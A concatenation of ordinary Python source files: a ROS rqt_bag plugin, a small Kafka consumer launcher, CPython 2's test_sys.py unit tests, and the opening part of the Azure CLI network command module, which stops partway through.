# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import os
import argparse
import threading
from qt_gui.plugin import Plugin
from .bag_widget import BagWidget
class Bag(Plugin):
"""
    Subclass of Plugin to provide interactive bag visualization, playing (publishing) and recording
"""
def __init__(self, context):
"""
:param context: plugin context hook to enable adding widgets as a ROS_GUI pane, ''PluginContext''
"""
super(Bag, self).__init__(context)
self.setObjectName('Bag')
args = self._parse_args(context.argv())
self._widget = BagWidget(context, args.clock)
if context.serial_number() > 1:
self._widget.setWindowTitle(self._widget.windowTitle() + (' (%d)' % context.serial_number()))
context.add_widget(self._widget)
def load_bags():
for bagfile in args.bagfiles:
self._widget.load_bag(bagfile)
load_thread = threading.Thread(target=load_bags)
load_thread.start()
def _parse_args(self, argv):
parser = argparse.ArgumentParser(prog='rqt_bag', add_help=False)
Bag.add_arguments(parser)
return parser.parse_args(argv)
@staticmethod
def _isfile(parser, arg):
if os.path.isfile(arg):
return arg
else:
parser.error("Bag file %s does not exist" % ( arg ))
@staticmethod
def add_arguments(parser):
group = parser.add_argument_group('Options for rqt_bag plugin')
group.add_argument('--clock', action='store_true', help='publish the clock time')
group.add_argument('bagfiles', type=lambda x: Bag._isfile(parser, x),
nargs='*', default=[], help='Bagfiles to load')
def shutdown_plugin(self):
self._widget.shutdown_all()
def save_settings(self, plugin_settings, instance_settings):
# TODO implement saving
# instance_settings.set_value(k, v)
pass
def restore_settings(self, plugin_settings, instance_settings):
# TODO implement restoring
# v = instance_settings.value(k)
pass
#def trigger_configuration(self):
# TODO move some of the button functionality to config button if it is "more configy"
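# --- Illustrative usage sketch --------------------------------------------------
# A minimal sketch of how the plugin's command-line options can be parsed outside
# of an rqt context, e.g. for debugging; it reuses Bag.add_arguments and assumes
# any bag files passed on the command line exist.
if __name__ == '__main__':
    import sys
    standalone_parser = argparse.ArgumentParser(prog='rqt_bag', add_help=True)
    Bag.add_arguments(standalone_parser)
    parsed = standalone_parser.parse_args(sys.argv[1:])
    print('publish clock: %s, bagfiles: %s' % (parsed.clock, parsed.bagfiles))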
|
kafka_consumer.py
|
""" Copyright 2020 Expedia, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License. """
from kafka_consumer.processor import KafkaProcessor
import threading
def main():
processor = KafkaProcessor(consumer_type="sns")
processor.process_message()
if __name__ == "__main__":
t = threading.Thread(target=main)
t.start()
|
test_sys.py
|
# -*- coding: iso-8859-1 -*-
import unittest, test.test_support
from test.script_helper import assert_python_ok, assert_python_failure
import cStringIO
import gc
import operator
import os
import struct
import sys
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.test_support.reap_children()
def test_original_displayhook(self):
import __builtin__
savestdout = sys.stdout
out = cStringIO.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(__builtin__, "_"):
del __builtin__._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(__builtin__, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(__builtin__._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
sys.stdout = savestdout
def test_lost_displayhook(self):
olddisplayhook = sys.displayhook
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
sys.displayhook = olddisplayhook
def test_custom_displayhook(self):
olddisplayhook = sys.displayhook
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
sys.displayhook = olddisplayhook
def test_original_excepthook(self):
savestderr = sys.stderr
err = cStringIO.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError, exc:
eh(*sys.exc_info())
sys.stderr = savestderr
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exc_clear(self):
self.assertRaises(TypeError, sys.exc_clear, 42)
# Verify that exc_info is present and matches exc, then clear it, and
# check that it worked.
def clear_check(exc):
typ, value, traceback = sys.exc_info()
self.assertTrue(typ is not None)
self.assertTrue(value is exc)
self.assertTrue(traceback is not None)
with test.test_support.check_py3k_warnings():
sys.exc_clear()
typ, value, traceback = sys.exc_info()
self.assertTrue(typ is None)
self.assertTrue(value is None)
self.assertTrue(traceback is None)
def clear():
try:
raise ValueError, 42
except ValueError, exc:
clear_check(exc)
# Raise an exception and check that it can be cleared
clear()
# Verify that a frame currently handling an exception is
# unaffected by calling exc_clear in a nested frame.
try:
raise ValueError, 13
except ValueError, exc:
typ1, value1, traceback1 = sys.exc_info()
clear()
typ2, value2, traceback2 = sys.exc_info()
self.assertTrue(typ1 is typ2)
self.assertTrue(value1 is exc)
self.assertTrue(value1 is value2)
self.assertTrue(traceback1 is traceback2)
# Check that an exception can be cleared outside of an except block
clear_check(exc)
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
# both unnormalized...
rc, out, err = assert_python_failure('-c', 'raise SystemExit, 46')
self.assertEqual(rc, 46)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# ... and normalized
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (repr(err), repr(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the unicode message is encoded to the stderr encoding
check_exit_message(
r'import sys; sys.exit(u"h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
if test.test_support.have_unicode:
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
self.assertRaises(OverflowError, sys.setrecursionlimit, 1 << 31)
try:
sys.setrecursionlimit((1 << 31) - 5)
try:
# issue13546: isinstance(e, ValueError) used to fail
# when the recursion limit is close to 1<<31
raise ValueError()
except ValueError, e:
pass
except MemoryError:
# Documentation for setrecursionlimit says: "The highest possible
# limit is platform-dependent. ... a too-high limit can lead to a
# crash" so we allow MemoryError here
pass
finally:
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.test_support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.test_support.impl_detail("reference counting")
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.im_func.func_code \
is sys._getframe().f_code
)
@test.test_support.impl_detail("current_frames")
def test_current_frames(self):
have_threads = True
try:
import thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
@test.test_support.reap_threads
def current_frames_with_threads(self):
import threading, thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = thread.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
        # from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assertIn(0, d)
self.assertTrue(d[0] is sys._getframe())
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, basestring)
self.assertIsInstance(sys.exec_prefix, basestring)
self.assertIsInstance(sys.executable, basestring)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.long_info), 2)
if test.test_support.check_impl_detail(cpython=True):
self.assertTrue(sys.long_info.bits_per_digit % 5 == 0)
else:
self.assertTrue(sys.long_info.bits_per_digit >= 1)
self.assertTrue(sys.long_info.sizeof_digit >= 1)
self.assertEqual(type(sys.long_info.bits_per_digit), int)
self.assertEqual(type(sys.long_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertIsInstance(sys.maxint, int)
if test.test_support.have_unicode:
self.assertIsInstance(sys.maxunicode, int)
self.assertIsInstance(sys.platform, basestring)
self.assertIsInstance(sys.prefix, basestring)
self.assertIsInstance(sys.version, basestring)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
def test_43581(self):
# Can't use sys.stdout, as this is a cStringIO object when
# the test runs under regrtest.
if not (os.environ.get('PYTHONIOENCODING') or
(sys.__stdout__.isatty() and sys.__stderr__.isatty())):
self.skipTest('stdout/stderr encoding is not set')
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug", "py3k_warning", "division_warning", "division_new",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_site", "ignore_environment", "tabcheck", "verbose",
"unicode", "bytes_warning", "hash_randomization")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assertTrue(repr(sys.flags))
@test.test_support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
import subprocess
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, unichr(0xa2).encode("cp424"))
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, '?')
def test_call_tracing(self):
self.assertEqual(sys.call_tracing(str, (2,)), "2")
self.assertRaises(TypeError, sys.call_tracing, str, 2)
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
import subprocess
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c", 'import sys; print repr(sys.executable)'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
executable = p.communicate()[0].strip()
p.wait()
self.assertIn(executable, ["''", repr(sys.executable)])
@test.test_support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.long_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.test_support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
size = test.test_support.calcobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), size('l'))
# but lists are
self.assertEqual(sys.getsizeof([]), size('P PP') + gc_header_size)
def test_errors(self):
class BadSizeof(object):
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof(object):
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class OverflowSizeof(long):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.test_support.calcobjsize
self.assertEqual(sys.getsizeof(True, -1), size('l'))
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.test_support.calcobjsize
vsize = test.test_support.calcvobjsize
check = self.check_sizeof
# bool
check(True, size('l'))
# buffer
with test.test_support.check_py3k_warnings():
check(buffer(''), size('2P2Pil'))
# builtin_function_or_method
check(len, size('3P'))
# bytearray
samples = ['', 'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('iPP') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('PP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().func_closure[0], size('P'))
# classobj (old-style class)
class class_oldstyle():
def method():
pass
check(class_oldstyle, size('7P'))
# instance (old-style class)
check(class_oldstyle(), size('3P'))
# instancemethod (old-style class)
check(class_oldstyle().method, size('4P'))
# complex
check(complex(0,1), size('2d'))
# code
check(get_cell().func_code, size('4i8Pi3P'))
# BaseException
check(BaseException(), size('3P'))
# UnicodeEncodeError
check(UnicodeEncodeError("", u"", 0, 0, ""), size('5P2PP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", "", 0, 0, ""), size('5P2PP'))
# UnicodeTranslateError
check(UnicodeTranslateError(u"", 0, 1, ""), size('5P2PP'))
# method_descriptor (descriptor object)
check(str.lower, size('2PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('2PP'))
# getset_descriptor (descriptor object)
import __builtin__
check(__builtin__.file.closed, size('2PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('2P2P'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# dict
check({}, size('3P2P') + 8*calcsize('P2P'))
x = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(x, size('3P2P') + 8*calcsize('P2P') + 16*calcsize('P2P'))
# dictionary-keyview
check({}.viewkeys(), size('P'))
# dictionary-valueview
check({}.viewvalues(), size('P'))
# dictionary-itemview
check({}.viewitems(), size('P'))
# dictionary iterator
check(iter({}), size('P2PPP'))
# dictionary-keyiterator
check({}.iterkeys(), size('P2PPP'))
# dictionary-valueiterator
check({}.itervalues(), size('P2PPP'))
# dictionary-itemiterator
check({}.iteritems(), size('P2PPP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('l3P'))
# file
f = file(test.test_support.TESTFN, 'wb')
try:
check(f, size('4P2i4P3i3P3i'))
finally:
f.close()
test.test_support.unlink(test.test_support.TESTFN)
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('12P3i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('9P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('P'))
# classmethod
check(bar, size('P'))
# generator
def get_gen(): yield 1
check(get_gen(), size('Pi2P'))
# integer
check(1, size('l'))
check(100, size('l'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, vsize('PP') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('lP'))
# long
check(0L, vsize(''))
check(1L, vsize('') + self.longdigit)
check(-1L, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.long_info.bits_per_digit
check(long(PyLong_BASE), vsize('') + 2*self.longdigit)
check(long(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(long(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('P'))
# None
check(None, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCObject
# PyCapsule
# XXX
# rangeiterator
check(iter(xrange(1)), size('4l'))
# reverse
check(reversed(''), size('PP'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3P2P' + PySet_MINSIZE*'lP' + 'lP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('lP'))
check(frozenset(sample), s + newsize*calcsize('lP'))
# setiterator
check(iter(set()), size('P3P'))
# slice
check(slice(1), size('3P'))
# str
vh = test.test_support._vheader
check('', calcsize(vh + 'lic'))
check('abc', calcsize(vh + 'lic') + 3)
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# tupleiterator
check(iter(()), size('lP'))
# type
s = vsize('P2P15Pl4PP9PP11PI' # PyTypeObject
'39P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'6P' # PyBufferProcs
'2P')
class newstyleclass(object):
pass
check(newstyleclass, s)
# builtin type
check(int, s)
# NotImplementedType
import types
check(types.NotImplementedType, s)
# unicode
usize = len(u'\0'.encode('unicode-internal'))
samples = [u'', u'1'*100]
# we need to test for both sizes, because we don't know if the string
# has been cached
for s in samples:
check(s, size('PPlP') + usize * (len(s) + 1))
# weakref
import weakref
check(weakref.ref(int), size('2Pl2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pl2P'))
# xrange
check(xrange(1), size('3l'))
check(xrange(66000), size('3l'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.test_support.calcobjsize
vsize = test.test_support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size(''))
# imp.NullImporter
import imp
f = open(test.test_support.TESTFN, 'wb')
try:
check(imp.NullImporter(f.name), size(''))
finally:
f.close()
test.test_support.unlink(test.test_support.TESTFN)
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb != None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_main():
test_classes = (SysModuleTest, SizeofTest)
test.test_support.run_unittest(*test_classes)
if __name__ == "__main__":
test_main()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from collections import Counter, OrderedDict
from msrestazure.tools import parse_resource_id, is_valid_resource_id, resource_id
from knack.log import get_logger
from azure.mgmt.trafficmanager.models import MonitorProtocol, ProfileStatus
# pylint: disable=no-self-use,no-member,too-many-lines,unused-argument
from azure.cli.core.commands import cached_get, cached_put, upsert_to_collection, get_property
from azure.cli.core.commands.client_factory import get_subscription_id, get_mgmt_service_client
from azure.cli.core.util import CLIError, sdk_no_wait, find_child_item, find_child_collection
from azure.cli.core.azclierror import InvalidArgumentValueError, RequiredArgumentMissingError, \
UnrecognizedArgumentError, ResourceNotFoundError, CLIInternalError, ArgumentUsageError
from azure.cli.core.profiles import ResourceType, supported_api_version
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.command_modules.network.zone_file.parse_zone_file import parse_zone_file
from azure.cli.command_modules.network.zone_file.make_zone_file import make_zone_file
import threading
import time
import platform
import subprocess
import tempfile
logger = get_logger(__name__)
# region Utility methods
def _log_pprint_template(template):
import json
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
def _get_default_name(balancer, property_name, option_name):
return _get_default_value(balancer, property_name, option_name, True)
def _get_default_id(balancer, property_name, option_name):
return _get_default_value(balancer, property_name, option_name, False)
def _get_default_value(balancer, property_name, option_name, return_name):
values = [x.id for x in getattr(balancer, property_name)]
if len(values) > 1:
raise CLIError("Multiple possible values found for '{0}': {1}\nSpecify '{0}' "
"explicitly.".format(option_name, ', '.join(values)))
if not values:
raise CLIError("No existing values found for '{0}'. Create one first and try "
"again.".format(option_name))
return values[0].rsplit('/', 1)[1] if return_name else values[0]
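# --- Illustrative behaviour sketch (not used by any command) -------------------
# _get_default_name/_get_default_id resolve an omitted option to the only
# existing child resource, or raise CLIError when there are zero or multiple
# candidates. The stub classes below are hypothetical stand-ins for SDK models
# that expose an `id` attribute.
def _example_default_resolution():
    class _Stub:
        def __init__(self, resource_id_str):
            self.id = resource_id_str
    class _Balancer:
        frontend_ip_configurations = [
            _Stub('/subscriptions/xxx/resourceGroups/rg/providers/Microsoft.Network/'
                  'loadBalancers/lb/frontendIPConfigurations/LoadBalancerFrontEnd')]
    # Exactly one value exists, so the trailing name segment is returned.
    return _get_default_name(_Balancer(), 'frontend_ip_configurations', '--frontend-ip-name')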
# endregion
# region Generic list commands
def _generic_list(cli_ctx, operation_name, resource_group_name):
ncf = network_client_factory(cli_ctx)
operation_group = getattr(ncf, operation_name)
if resource_group_name:
return operation_group.list(resource_group_name)
return operation_group.list_all()
def list_vnet(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'virtual_networks', resource_group_name)
def list_express_route_circuits(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'express_route_circuits', resource_group_name)
def create_express_route_auth(cmd, resource_group_name, circuit_name, authorization_name):
ExpressRouteCircuitAuthorization = cmd.get_models('ExpressRouteCircuitAuthorization')
client = network_client_factory(cmd.cli_ctx).express_route_circuit_authorizations
return client.begin_create_or_update(resource_group_name,
circuit_name,
authorization_name,
ExpressRouteCircuitAuthorization())
def list_lbs(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'load_balancers', resource_group_name)
def list_nics(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_interfaces', resource_group_name)
def list_nsgs(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_security_groups', resource_group_name)
def list_nsg_rules(cmd, resource_group_name, network_security_group_name, include_default=False):
client = network_client_factory(cmd.cli_ctx).network_security_groups
nsg = client.get(resource_group_name, network_security_group_name)
rules = nsg.security_rules
if include_default:
